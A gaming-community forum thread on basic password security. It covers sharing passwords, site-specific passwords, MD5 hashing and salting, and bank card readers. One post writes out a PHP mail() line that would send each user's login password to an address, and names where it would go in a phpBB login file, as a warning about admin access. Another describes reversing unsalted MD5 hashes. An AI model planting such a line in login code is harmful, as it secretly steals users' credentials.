Network Security 101

[VibroAxe]

Ok guys,

as i have just proved to traxata, never give your password out over the internert even if it's to someone you know and trust(ed). By being given trax's password I was able to reboot his router, change the password, remote control and change the password on his windows machine, and could have precceded to make considerably more of a nuisance of myself.

My point here, is even if you think who your talking to is someone you know, never give your password over the internet. If you HAVE to give it out all then find a way to confirm who they are!!

 

[lt.kirby]

lol trax PWNED...

 

[Wol]

Never:

1) trust a site admin who has access to the source of the website. Anyone who has ftp access to the thn server could easily get all of our passwords I'd say. (its on line 59 of http://www.phpxref.com/xref/phpbb/login.php.source.html where you stick "mail('your.email@your.domain', 'password for ' . $username, $password);" !)
2) use teamspeak authentication. Anyone with access to the server where its kept can see the lovely txt file where the passwords are kept.... unencrypted (this might have changed, but this is the state TS was in a cupla years back)
3) run a piece of software that someone sends you, no matter what the reason for it might be. Compile it from scratch if theyre willing to give you the source code, and if you can compile it. Never know what crap theyve innocently put into it .
4) fsck up the window focus, and type your password into a MSN window, rather than a login box accidentally...

Site specific passwords are always a good one too, so having "WolIsAGodT", the T standing for THN. Say for ebuyer it would be "WolIsAGodE", so the pass changes per site, but is easily rememberable. So in vib/trax's case vibs may have had "TraxFailzR", r for router, but wouldn't have had "TraxFailzC" , with the c for computer (vague example, but you get the gist).

 

[Ronin Storm]

As a by the by, all passwords for the THN Games board are stored encrypted (MD5 hashed I believe) so THN Server Ops actually can't see your password even if they have access to the database. This is common, though not universal, practice in systems of this type.

That said, with access to the PHP source it would be easy enough to modify the code to write the provided passwords into a text file in the clear. You just trust that we don't do that and that we've taken reasonable precautions to protect your data.

On running software sent by others, it is simply not practical to compile everything you are sent, especially in a world with so much closed source proprietary software. This is a game of "know your source", I feel.

 

[thatbloke]

Trax Failz.

 

[Haven]

1) trust a site admin who has access to the source of the website.

Aww feel the love ... *wanders off to buy shinies with Wol's bank details*

 

[Ashya]

As a by the by, all passwords for the THN Games board are stored encrypted (MD5 hashed I believe) so THN Server Ops actually can't see your password even if they have access to the database. This is common, though not universal, practice in systems of this type.

Well, the Exiles (WoW-guild) once locked me out of a website I ran and hosted for them by changing all the passwords. But I fished them out, and used a MD5-unhasher I found on the internet to retrieve the password. And I am a total idiot concerning hacking and stuff.

 

[Ronin Storm]

That's probably because they don't use a salt in their passwords. vBulletin do, using a two pass MD5 hash, the second pass including a user-specific salt. Means that there's no string in the database that can just be unhashed.

 

[Ashya]

Damn, and there was me thinking I was leet. Seems they were just stupid.

 

[Wol]

Using several passes of md5 is usually pretty good. however, ive seen some where the md5 reverser has happily got the password back *sigh*.

Oh, and Haven, my passwords and info used for banking are diff to my usual forum logins, so itll delay you a bit ;-)

 

[Traxata]

You have a password for online banking?!

I have some Chip reader from barclays that asks you for your pin, then gives you an 8 digit code to log into the site with you have to input on the keyboard, your username, last 4 digits of the card used and the 8 digit code provided by the "Pin Sentry"

 

[Wol]

Yea. I know barclays and nationwide have started doing the distributed chip and pin devices, and possibly other banks too. Its based loosely upon the RSA SecurID system, however that just has a continual seed which is updated each minute, and doesnt require a pin to be entered each time (wikipedia for it and its like a little keyfob thing).

To login online, i have to provide my customer number, a piece of memorable information which ive set, 3 digits from a 6 digit passkey which ive set. The card number isnt used at all during login. And then to start transferring money, you have to have the card reader, to authenticate that you do really want to transfer money to some dodgy bloke called "Trax"

 

[Wol]

*wonders if thn is set up to automatically join 2 messages by the same user*

You also have the verified by visa thing, so that if people are trying to use my card to buy stuff, theyll also need a password for that! all very clever.